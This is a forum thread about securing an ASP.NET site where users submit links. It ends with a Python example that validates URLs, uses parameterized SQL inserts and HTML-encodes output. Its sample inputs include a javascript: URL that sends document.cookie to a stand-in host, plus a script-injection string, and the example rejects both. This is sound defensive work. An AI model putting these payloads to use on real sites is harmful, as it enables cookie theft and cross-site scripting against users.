Bytes | Software Development & Data Engineering Community

Security issues relating to submitting href links and text:

I am currently developing a website (ASP.NET) which allows users to submit a web form containing a href link in one field and descriptive text in another field. The records will be stored to varchar columns in a SQL Server 2000 database and hosted by a 3rd party ISP. The list of links will then be made available to other users.

What general security precautions should be taken when developing a website of this nature? Specifically, I am concerned about the possibility of malicious SQL or ASP script insertion and its impact on the web or database server. I am already using client and server side validation to restrict the description field to alpha-numeric characters, period and spaces.
Jul 21 '05 #1
Cross-site scripting vulnerabilities for starters...

Think about exploits that come out for Internet Explorer that rely on carefully crafted malicious URLs. Someone could submit one of those into your system. Alternatively, they might submit a link that grabs cookies for your domain, and redirects them to a site of the user's choosing. Etc.

Check out the OWASP website (www.owasp.org) for more information on securing web applications. Microsoft also has a book you can download from MSDN on building secure ASP.Net applications. Get that as well.

Cheers
Ken

Jul 21 '05 #2
Please do not cross-post to so many newsgroups.

Regular expressions are your friends -- use them wisely. You'll want to ensure that the data entered matches the formats you expect (easy for URLs, harder for "descriptive text"). See http://www.devx.com/vb2themax/Tip/19510 for instance.

--
Thanks,

Eric Lawrence
Program Manager
Assistance and Worldwide Services

This posting is provided "AS IS" with no warranties, and confers no rights.


Jul 21 '05 #3
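Putting Ken's and Eric's advice together, here is an added example that is not code from either poster or from the original thread. It is written in Python rather than the poster's ASP.NET, with an in-memory SQLite table standing in for the SQL Server 2000 varchar columns; the sample submissions are constructed. It shows a scheme whitelist and attribute-safe check for the link field, the poster's own alphanumeric rule for the description, a parameterized INSERT, and HTML encoding when the list is rendered back to other users.

```python
import html
import re
import sqlite3
from urllib.parse import urlsplit

# Constructed sample submissions (not from the thread): a benign link, a
# javascript: URL of the cookie-grabbing kind Ken mentions, an attempt to
# break out of the href attribute, and a benign link whose query string
# must be encoded on output.
SUBMISSIONS = [
    ("http://www.owasp.org/", "OWASP web application security project"),
    ("javascript:location='http://evil.example/?c='+document.cookie", "Free stuff"),
    ('http://example.com/"><script>alert(1)</script>', "Nice site"),
    ("https://example.com/a?b=1&c=2", "Example site."),
]

# The poster's own rule for the description: letters, digits, period, space.
DESCRIPTION_RE = re.compile(r"^[A-Za-z0-9. ]{1,200}$")

def valid_link(url: str) -> bool:
    """Absolute http/https URL with a host, printable ASCII only, and none of
    the characters that could end an href attribute early."""
    if not url or len(url) > 2048 or any(not 0x20 <= ord(c) <= 0x7E for c in url):
        return False
    try:
        parts = urlsplit(url)
    except ValueError:  # e.g. unbalanced IPv6 brackets
        return False
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return False
    return re.search(r"""[<>"'\s]""", url) is None

def valid_description(text: str) -> bool:
    return DESCRIPTION_RE.fullmatch(text) is not None

def render_link(url: str, text: str) -> str:
    """Encode on output too: data read back from the database is not trusted."""
    return '<a href="%s">%s</a>' % (html.escape(url, quote=True), html.escape(text))

def process(submissions):
    """Validate, store via a parameterized INSERT, return (rendered, rejected)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE links(url VARCHAR(2048), descr VARCHAR(200))")
    rejected = []
    for url, text in submissions:
        if valid_link(url) and valid_description(text):
            conn.execute("INSERT INTO links(url, descr) VALUES (?, ?)", (url, text))
        else:
            rejected.append(url)
    rows = conn.execute("SELECT url, descr FROM links").fetchall()
    return [render_link(u, t) for u, t in rows], rejected
```

The same three layers map onto ASP.NET as a RegularExpressionValidator plus server-side re-check, SqlParameter on the SqlCommand, and HttpUtility.HtmlEncode / HtmlAttributeEncode when the list is written out.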
